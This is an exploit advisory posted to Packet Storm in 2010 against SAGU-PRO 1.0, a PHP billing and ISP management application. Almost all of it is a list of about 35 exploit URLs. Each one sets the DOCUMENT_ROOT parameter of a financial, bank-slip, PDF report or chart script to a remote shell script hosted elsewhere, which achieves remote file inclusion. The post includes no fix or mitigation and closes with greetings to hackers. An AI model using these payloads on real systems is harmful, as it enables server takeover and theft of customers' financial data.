SAGU-PRO 1.0 Remote File Inclusion

2010-04-06T00:00:00
ID PACKETSTORM:88095
Type packetstorm
Reporter mat
Modified 2010-04-06T00:00:00

Description

                                        
                                            ` \\\|///  
\\ - - //  
( @ @ )  
----oOOo--(_)-oOOo--------------------------------------------------  
SAGU-PRO v1.0 Multiple Remote File Include Vulnerability  
Script: http://gulbf.com.br/?q=node/145  
Author: mat  
Mail: rahmat_punk@hotmail.com  
---------------Ooooo------------------------------------------------  
( )  
ooooO ) /  
( ) (_/  
\ (  
\_)  
  
//-----------------------------------------------------------------------------------------------------------+  
http://[target]/[path]/cliente/ver_imagem.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/importar_pgtos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/up_pgtos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/ver_pgtos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/boletounibanco.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/bb/boleto_bb.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/bradesco06/boleto_bradesco.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/cef/boleto_cef.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/hsbc/boleto_hsbc.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/itau/boleto_itau.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/real57/boleto_real.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/recibo/recibo.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/santader_banespa_102/boleto_santander_banespa.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/cc/up_fluxo.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/cc/importar_fluxos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/cc/ver_fluxos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/cc/post/altera_contacorrente.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/clientes_ativos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/clientes_data_ativacao.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/clientes_geral.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/clientes_suspensos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/clientes_valores_cobranca.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/clientes_vencto.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/prev_outros_servicos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/prev_pacte_naveg.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/resumo_log_pacote_conexao.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/graf_chamados_atendente.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/graf_evolucao_instalacoes_anual.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/graf_evolucao_instalacoes_mensal.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/graf_mensalidades_geradas_mensal.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/graf_visao_chamados.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/pre_graf_chamados_atendente.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/pre_graf_evolucao_instalacoes_mensal.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/pre_graf_mensalidades_geradas_mensal.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/pre_graf_visao_chamados.php?DOCUMENT_ROOT=http://[shellscript]  
//-----------------------------------------------------------------------------------------------------------+  
  
Greetings: All Hackerz  
`